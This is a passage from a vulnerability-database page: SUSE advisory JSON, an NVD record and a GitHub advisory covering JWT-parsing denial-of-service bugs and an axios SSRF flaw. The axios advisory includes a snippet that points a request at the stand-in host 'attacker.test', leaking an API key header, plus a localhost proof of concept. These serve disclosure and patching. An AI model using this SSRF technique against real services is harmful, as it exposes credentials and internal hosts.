"text": "Copyright 2024 SUSE LLC. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "velociraptor-0.7.0.4.git163.87ee3570-1.1 on GA media",
"title": "Title of the patch"
},
{
"category": "description",
"text": "These are all security issues fixed in the velociraptor-0.7.0.4.git163.87ee3570-1.1 package on the GA media of openSUSE Tumbleweed.",
"title": "Description of the patch"
},
{
"category": "details",
"text": "openSUSE-Tumbleweed-2025-15307",
"title": "Patchnames"
},
{
"category": "legal_disclaimer",
"text": "CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).",
"title": "Terms of use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://www.suse.com/support/security/contact/",
"name": "SUSE Product Security Team",
"namespace": "https://www.suse.com/"
},
"references": [
{
"category": "external",
"summary": "SUSE ratings",
"url": "https://www.suse.com/support/security/rating/"
},
{
"category": "self",
"summary": "URL of this CSAF notice",
"url": "https://ftp.suse.com/pub/projects/security/csaf/opensuse-su-2025_15307-1.json"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-27144 page",
"url": "https://www.suse.com/security/cve/CVE-2025-27144/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-27152 page",
"url": "https://www.suse.com/security/cve/CVE-2025-27152/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-30204 page",
"url": "https://www.suse.com/security/cve/CVE-2025-30204/"
}
],
"title": "velociraptor-0.7.0.4.git163.87ee3570-1.1 on GA media",
"tracking": {
"current_release_date": "2025-07-03T00:00:00Z",
"generator": {
"date": "2025-07-03T00:00:00Z",
"engine": {
"name": "cve-database.git:bin/generate-csaf.pl",
"version": "1"
}
},
"id": "openSUSE-SU-2025:15307-1",
"initial_release_date": "2025-07-03T00:00:00Z",
"revision_history": [
{
"date": "2025-07-03T00:00:00Z",
"number": "1",
"summary": "Current version"
}
],
"status": "final",
"version": "1"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_version",
"name": "velociraptor-0.7.0.4.git163.87ee3570-1.1.aarch64",
"product": {
"name": "velociraptor-0.7.0.4.git163.87ee3570-1.1.aarch64",
"product_id": "velociraptor-0.7.0.4.git163.87ee3570-1.1.aarch64"
}
}
],
"category": "architecture",
"name": "aarch64"
},
{
"branches": [
{
"category": "product_version",
"name": "velociraptor-0.7.0.4.git163.87ee3570-1.1.ppc64le",
"product": {
"name": "velociraptor-0.7.0.4.git163.87ee3570-1.1.ppc64le",
"product_id": "velociraptor-0.7.0.4.git163.87ee3570-1.1.ppc64le"
}
}
],
"category": "architecture",
"name": "ppc64le"
},
{
"branches": [
{
"category": "product_version",
"name": "velociraptor-0.7.0.4.git163.87ee3570-1.1.s390x",
"product": {
"name": "velociraptor-0.7.0.4.git163.87ee3570-1.1.s390x",
"product_id": "velociraptor-0.7.0.4.git163.87ee3570-1.1.s390x"
}
}
],
"category": "architecture",
"name": "s390x"
},
{
"branches": [
{
"category": "product_version",
"name": "velociraptor-0.7.0.4.git163.87ee3570-1.1.x86_64",
"product": {
"name": "velociraptor-0.7.0.4.git163.87ee3570-1.1.x86_64",
"product_id": "velociraptor-0.7.0.4.git163.87ee3570-1.1.x86_64"
}
}
],
"category": "architecture",
"name": "x86_64"
},
{
"branches": [
{
"category": "product_name",
"name": "openSUSE Tumbleweed",
"product": {
"name": "openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed",
"product_identification_helper": {
"cpe": "cpe:/o:opensuse:tumbleweed"
}
}
}
],
"category": "product_family",
"name": "SUSE Linux Enterprise"
}
],
"category": "vendor",
"name": "SUSE"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "velociraptor-0.7.0.4.git163.87ee3570-1.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:velociraptor-0.7.0.4.git163.87ee3570-1.1.aarch64"
},
"product_reference": "velociraptor-0.7.0.4.git163.87ee3570-1.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "velociraptor-0.7.0.4.git163.87ee3570-1.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:velociraptor-0.7.0.4.git163.87ee3570-1.1.ppc64le"
},
"product_reference": "velociraptor-0.7.0.4.git163.87ee3570-1.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "velociraptor-0.7.0.4.git163.87ee3570-1.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:velociraptor-0.7.0.4.git163.87ee3570-1.1.s390x"
},
"product_reference": "velociraptor-0.7.0.4.git163.87ee3570-1.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "velociraptor-0.7.0.4.git163.87ee3570-1.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:velociraptor-0.7.0.4.git163.87ee3570-1.1.x86_64"
},
"product_reference": "velociraptor-0.7.0.4.git163.87ee3570-1.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2025-27144",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-27144"
}
],
"notes": [
{
"category": "general",
"text": "Go JOSE provides an implementation of the Javascript Object Signing and Encryption set of standards in Go, including support for JSON Web Encryption (JWE), JSON Web Signature (JWS), and JSON Web Token (JWT) standards. In versions on the 4.x branch prior to version 4.0.5, when parsing compact JWS or JWE input, Go JOSE could use excessive memory. The code used strings.Split(token, \".\") to split JWT tokens, which is vulnerable to excessive memory consumption when processing maliciously crafted tokens with a large number of `.` characters. An attacker could exploit this by sending numerous malformed tokens, leading to memory exhaustion and a Denial of Service. Version 4.0.5 fixes this issue. As a workaround, applications could pre-validate that payloads passed to Go JOSE do not contain an excessive number of `.` characters.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:velociraptor-0.7.0.4.git163.87ee3570-1.1.aarch64",
"openSUSE Tumbleweed:velociraptor-0.7.0.4.git163.87ee3570-1.1.ppc64le",
"openSUSE Tumbleweed:velociraptor-0.7.0.4.git163.87ee3570-1.1.s390x",
"openSUSE Tumbleweed:velociraptor-0.7.0.4.git163.87ee3570-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-27144",
"url": "https://www.suse.com/security/cve/CVE-2025-27144"
},
{
"category": "external",
"summary": "SUSE Bug 1237608 for CVE-2025-27144",
"url": "https://bugzilla.suse.com/1237608"
},
{
"category": "external",
"summary": "SUSE Bug 1237609 for CVE-2025-27144",
"url": "https://bugzilla.suse.com/1237609"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:velociraptor-0.7.0.4.git163.87ee3570-1.1.aarch64",
"openSUSE Tumbleweed:velociraptor-0.7.0.4.git163.87ee3570-1.1.ppc64le",
"openSUSE Tumbleweed:velociraptor-0.7.0.4.git163.87ee3570-1.1.s390x",
"openSUSE Tumbleweed:velociraptor-0.7.0.4.git163.87ee3570-1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"openSUSE Tumbleweed:velociraptor-0.7.0.4.git163.87ee3570-1.1.aarch64",
"openSUSE Tumbleweed:velociraptor-0.7.0.4.git163.87ee3570-1.1.ppc64le",
"openSUSE Tumbleweed:velociraptor-0.7.0.4.git163.87ee3570-1.1.s390x",
"openSUSE Tumbleweed:velociraptor-0.7.0.4.git163.87ee3570-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-07-03T00:00:00Z",
"details": "important"
}
],
"title": "CVE-2025-27144"
},
{
"cve": "CVE-2025-27152",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-27152"
}
],
"notes": [
{
"category": "general",
"text": "axios is a promise based HTTP client for the browser and node.js. The issue occurs when passing absolute URLs rather than protocol-relative URLs to axios. Even if \u2060baseURL is set, axios sends the request to the specified absolute URL, potentially causing SSRF and credential leakage. This issue impacts both server-side and client-side usage of axios. This issue is fixed in 1.8.2.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:velociraptor-0.7.0.4.git163.87ee3570-1.1.aarch64",
"openSUSE Tumbleweed:velociraptor-0.7.0.4.git163.87ee3570-1.1.ppc64le",
"openSUSE Tumbleweed:velociraptor-0.7.0.4.git163.87ee3570-1.1.s390x",
"openSUSE Tumbleweed:velociraptor-0.7.0.4.git163.87ee3570-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-27152",
"url": "https://www.suse.com/security/cve/CVE-2025-27152"
},
{
"category": "external",
"summary": "SUSE Bug 1239305 for CVE-2025-27152",
"url": "https://bugzilla.suse.com/1239305"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:velociraptor-0.7.0.4.git163.87ee3570-1.1.aarch64",
"openSUSE Tumbleweed:velociraptor-0.7.0.4.git163.87ee3570-1.1.ppc64le",
"openSUSE Tumbleweed:velociraptor-0.7.0.4.git163.87ee3570-1.1.s390x",
"openSUSE Tumbleweed:velociraptor-0.7.0.4.git163.87ee3570-1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"products": [
"openSUSE Tumbleweed:velociraptor-0.7.0.4.git163.87ee3570-1.1.aarch64",
"openSUSE Tumbleweed:velociraptor-0.7.0.4.git163.87ee3570-1.1.ppc64le",
"openSUSE Tumbleweed:velociraptor-0.7.0.4.git163.87ee3570-1.1.s390x",
"openSUSE Tumbleweed:velociraptor-0.7.0.4.git163.87ee3570-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-07-03T00:00:00Z",
"details": "important"
}
],
"title": "CVE-2025-27152"
},
{
"cve": "CVE-2025-30204",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-30204"
}
],
"notes": [
{
"category": "general",
"text": "golang-jwt is a Go implementation of JSON Web Tokens. Starting in version 3.2.0 and prior to versions 5.2.2 and 4.5.2, the function parse.ParseUnverified splits (via a call to strings.Split) its argument (which is untrusted data) on periods. As a result, in the face of a malicious request whose Authorization header consists of Bearer followed by many period characters, a call to that function incurs allocations to the tune of O(n) bytes (where n stands for the length of the function\u0027s argument), with a constant factor of about 16. This issue is fixed in 5.2.2 and 4.5.2.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:velociraptor-0.7.0.4.git163.87ee3570-1.1.aarch64",
"openSUSE Tumbleweed:velociraptor-0.7.0.4.git163.87ee3570-1.1.ppc64le",
"openSUSE Tumbleweed:velociraptor-0.7.0.4.git163.87ee3570-1.1.s390x",
"openSUSE Tumbleweed:velociraptor-0.7.0.4.git163.87ee3570-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-30204",
"url": "https://www.suse.com/security/cve/CVE-2025-30204"
},
{
"category": "external",
"summary": "SUSE Bug 1240441 for CVE-2025-30204",
"url": "https://bugzilla.suse.com/1240441"
},
{
"category": "external",
"summary": "SUSE Bug 1240442 for CVE-2025-30204",
"url": "https://bugzilla.suse.com/1240442"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:velociraptor-0.7.0.4.git163.87ee3570-1.1.aarch64",
"openSUSE Tumbleweed:velociraptor-0.7.0.4.git163.87ee3570-1.1.ppc64le",
"openSUSE Tumbleweed:velociraptor-0.7.0.4.git163.87ee3570-1.1.s390x",
"openSUSE Tumbleweed:velociraptor-0.7.0.4.git163.87ee3570-1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"openSUSE Tumbleweed:velociraptor-0.7.0.4.git163.87ee3570-1.1.aarch64",
"openSUSE Tumbleweed:velociraptor-0.7.0.4.git163.87ee3570-1.1.ppc64le",
"openSUSE Tumbleweed:velociraptor-0.7.0.4.git163.87ee3570-1.1.s390x",
"openSUSE Tumbleweed:velociraptor-0.7.0.4.git163.87ee3570-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-07-03T00:00:00Z",
"details": "important"
}
],
"title": "CVE-2025-30204"
}
]
}
fkie_cve-2025-27152
Vulnerability from fkie_nvd
Published
2025-03-07 16:15
Modified
2025-03-07 20:15
Severity ?
Summary
axios is a promise based HTTP client for the browser and node.js. The issue occurs when passing absolute URLs rather than protocol-relative URLs to axios. Even if baseURL is set, axios sends the request to the specified absolute URL, potentially causing SSRF and credential leakage. This issue impacts both server-side and client-side usage of axios. This issue is fixed in 1.8.2.
References
Impacted products
| Vendor | Product | Version |
|---|
{
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "axios is a promise based HTTP client for the browser and node.js. The issue occurs when passing absolute URLs rather than protocol-relative URLs to axios. Even if \u2060baseURL is set, axios sends the request to the specified absolute URL, potentially causing SSRF and credential leakage. This issue impacts both server-side and client-side usage of axios. This issue is fixed in 1.8.2."
},
{
"lang": "es",
"value": "axios es un cliente HTTP basado en promesas para el navegador y node.js. El problema ocurre cuando se pasan URL absolutas en lugar de URL relativas al protocolo a axios. Incluso si se configura ?baseURL, axios env\u00eda la solicitud a la URL absoluta especificada, lo que puede provocar una fuga de credenciales y SSRF. Este problema afecta tanto al uso del lado del servidor como del lado del cliente de axios. Este problema se solucion\u00f3 en 1.8.2."
}
],
"id": "CVE-2025-27152",
"lastModified": "2025-03-07T20:15:38.560",
"metrics": {
"cvssMetricV40": [
{
"cvssData": {
"Automatable": "NOT_DEFINED",
"Recovery": "NOT_DEFINED",
"Safety": "NOT_DEFINED",
"attackComplexity": "LOW",
"attackRequirements": "NONE",
"attackVector": "NETWORK",
"availabilityRequirement": "NOT_DEFINED",
"baseScore": 7.7,
"baseSeverity": "HIGH",
"confidentialityRequirement": "NOT_DEFINED",
"exploitMaturity": "PROOF_OF_CONCEPT",
"integrityRequirement": "NOT_DEFINED",
"modifiedAttackComplexity": "NOT_DEFINED",
"modifiedAttackRequirements": "NOT_DEFINED",
"modifiedAttackVector": "NOT_DEFINED",
"modifiedPrivilegesRequired": "NOT_DEFINED",
"modifiedSubAvailabilityImpact": "NOT_DEFINED",
"modifiedSubConfidentialityImpact": "NOT_DEFINED",
"modifiedSubIntegrityImpact": "NOT_DEFINED",
"modifiedUserInteraction": "NOT_DEFINED",
"modifiedVulnAvailabilityImpact": "NOT_DEFINED",
"modifiedVulnConfidentialityImpact": "NOT_DEFINED",
"modifiedVulnIntegrityImpact": "NOT_DEFINED",
"privilegesRequired": "NONE",
"providerUrgency": "NOT_DEFINED",
"subAvailabilityImpact": "NONE",
"subConfidentialityImpact": "NONE",
"subIntegrityImpact": "NONE",
"userInteraction": "NONE",
"valueDensity": "NOT_DEFINED",
"vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"version": "4.0",
"vulnAvailabilityImpact": "NONE",
"vulnConfidentialityImpact": "HIGH",
"vulnIntegrityImpact": "NONE",
"vulnerabilityResponseEffort": "NOT_DEFINED"
},
"source": "security-advisories@github.com",
"type": "Secondary"
}
]
},
"published": "2025-03-07T16:15:38.773",
"references": [
{
"source": "security-advisories@github.com",
"url": "https://github.com/axios/axios/issues/6463"
},
{
"source": "security-advisories@github.com",
"url": "https://github.com/axios/axios/security/advisories/GHSA-jr5f-v2jv-69x6"
},
{
"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"url": "https://github.com/axios/axios/security/advisories/GHSA-jr5f-v2jv-69x6"
}
],
"sourceIdentifier": "security-advisories@github.com",
"vulnStatus": "Awaiting Analysis",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-918"
}
],
"source": "security-advisories@github.com",
"type": "Secondary"
}
]
}
ghsa-jr5f-v2jv-69x6
Vulnerability from github
Published
2025-03-07 15:16
Modified
2025-03-28 14:57
Severity ?
VLAI Severity ?
Summary
axios Requests Vulnerable To Possible SSRF and Credential Leakage via Absolute URL
Details
Summary
A previously reported issue in axios demonstrated that using protocol-relative URLs could lead to SSRF (Server-Side Request Forgery). Reference: axios/axios#6463
A similar problem that occurs when passing absolute URLs rather than protocol-relative URLs to axios has been identified. Even if baseURL is set, axios sends the request to the specified absolute URL, potentially causing SSRF and credential leakage. This issue impacts both server-side and client-side usage of axios.
Details
Consider the following code snippet:
```js import axios from "axios";
const internalAPIClient = axios.create({ baseURL: "http://example.test/api/v1/users/", headers: { "X-API-KEY": "1234567890", }, });
// const userId = "123"; const userId = "http://attacker.test/";
await internalAPIClient.get(userId); // SSRF ```
In this example, the request is sent to http://attacker.test/ instead of the baseURL. As a result, the domain owner of attacker.test would receive the X-API-KEY included in the request headers.
It is recommended that:
- When
baseURLis set, passing an absolute URL such ashttp://attacker.test/toget()should not ignorebaseURL. - Before sending the HTTP request (after combining the
baseURLwith the user-provided parameter), axios should verify that the resulting URL still begins with the expectedbaseURL.
PoC
Follow the steps below to reproduce the issue:
- Set up two simple HTTP servers:
mkdir /tmp/server1 /tmp/server2
echo "this is server1" > /tmp/server1/index.html
echo "this is server2" > /tmp/server2/index.html
python -m http.server -d /tmp/server1 10001 &
python -m http.server -d /tmp/server2 10002 &
- Create a script (e.g., main.js):
js
import axios from "axios";
const client = axios.create({ baseURL: "http://localhost:10001/" });
const response = await client.get("http://localhost:10002/");
console.log(response.data);
- Run the script:
$ node main.js
this is server2
Even though baseURL is set to http://localhost:10001/, axios sends the request to http://localhost:10002/.
Impact
- Credential Leakage: Sensitive API keys or credentials (configured in axios) may be exposed to unintended third-party hosts if an absolute URL is passed.
- SSRF (Server-Side Request Forgery): Attackers can send requests to other internal hosts on the network where the axios program is running.
- Affected Users: Software that uses
baseURLand does not validate path parameters is affected by this issue.
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "axios"
},
"ranges": [
{
"events": [
{
"introduced": "1.0.0"
},
{
"fixed": "1.8.2"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "npm",
"name": "axios"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "0.30.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2025-27152"
],
"database_specific": {
"cwe_ids": [
"CWE-918"
],
"github_reviewed": true,
"github_reviewed_at": "2025-03-07T15:16:00Z",
"nvd_published_at": "2025-03-07T16:15:38Z",
"severity": "HIGH"
},
"details": "### Summary\n\nA previously reported issue in axios demonstrated that using protocol-relative URLs could lead to SSRF (Server-Side Request Forgery).\nReference: axios/axios#6463\n\nA similar problem that occurs when passing absolute URLs rather than protocol-relative URLs to axios has been identified. Even if \u2060`baseURL` is set, axios sends the request to the specified absolute URL, potentially causing SSRF and credential leakage. This issue impacts both server-side and client-side usage of axios.\n\n### Details\n\nConsider the following code snippet:\n\n```js\nimport axios from \"axios\";\n\nconst internalAPIClient = axios.create({\n baseURL: \"http://example.test/api/v1/users/\",\n headers: {\n \"X-API-KEY\": \"1234567890\",\n },\n});\n\n// const userId = \"123\";\nconst userId = \"http://attacker.test/\";\n\nawait internalAPIClient.get(userId); // SSRF\n```\n\nIn this example, the request is sent to `http://attacker.test/` instead of the `baseURL`. As a result, the domain owner of `attacker.test` would receive the `X-API-KEY` included in the request headers.\n\nIt is recommended that:\n\n-\tWhen `baseURL` is set, passing an absolute URL such as `http://attacker.test/` to `get()` should not ignore `baseURL`.\n-\tBefore sending the HTTP request (after combining the `baseURL` with the user-provided parameter), axios should verify that the resulting URL still begins with the expected `baseURL`.\n\n### PoC\n\nFollow the steps below to reproduce the issue:\n\n1.\tSet up two simple HTTP servers:\n\n```\nmkdir /tmp/server1 /tmp/server2\necho \"this is server1\" \u003e /tmp/server1/index.html \necho \"this is server2\" \u003e /tmp/server2/index.html\npython -m http.server -d /tmp/server1 10001 \u0026\npython -m http.server -d /tmp/server2 10002 \u0026\n```\n\n\n2.\tCreate a script (e.g., main.js):\n\n```js\nimport axios from \"axios\";\nconst client = axios.create({ baseURL: \"http://localhost:10001/\" });\nconst response = await client.get(\"http://localhost:10002/\");\nconsole.log(response.data);\n```\n\n3.\tRun the script:\n\n```\n$ node main.js\nthis is server2\n```\n\nEven though `baseURL` is set to `http://localhost:10001/`, axios sends the request to `http://localhost:10002/`.\n\n### Impact\n\n-\tCredential Leakage: Sensitive API keys or credentials (configured in axios) may be exposed to unintended third-party hosts if an absolute URL is passed.\n-\tSSRF (Server-Side Request Forgery): Attackers can send requests to other internal hosts on the network where the axios program is running.\n-\tAffected Users: Software that uses `baseURL` and does not validate path parameters is affected by this issue.",
"id": "GHSA-jr5f-v2jv-69x6",
"modified": "2025-03-28T14:57:51Z",
"published": "2025-03-07T15:16:00Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/axios/axios/security/advisories/GHSA-jr5f-v2jv-69x6"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-27152"
},
{
"type": "WEB",
"url": "https://github.com/axios/axios/issues/6463"
},
{
"type": "WEB",
"url": "https://github.com/axios/axios/pull/6829"
},
{
"type": "WEB",
"url": "https://github.com/axios/axios/commit/02c3c69ced0f8fd86407c23203835892313d7fde"
},
{
"type": "WEB",
"url": "https://github.com/axios/axios/commit/fb8eec214ce7744b5ca787f2c3b8339b2f54b00f"
},
{
"type": "PACKAGE",
"url": "https://github.com/axios/axios"
},
{
"type": "WEB",
"url": "https://github.com/axios/axios/releases/tag/v1.8.2"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:P",
"type": "CVSS_V4"
}
],
"summary": "axios Requests Vulnerable To Possible SSRF and Credential Leakage via Absolute URL"
}
Loading…
Loading…
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
- Confirmed: The vulnerability is confirmed from an analyst perspective.
- Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
- Patched: This vulnerability was successfully patched by the user reporting the sighting.
- Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
- Not confirmed: The user expresses doubt about the veracity of the vulnerability.
- Not patched: This vulnerability was not successfully patched by the user reporting the sighting.
Loading…
Loading…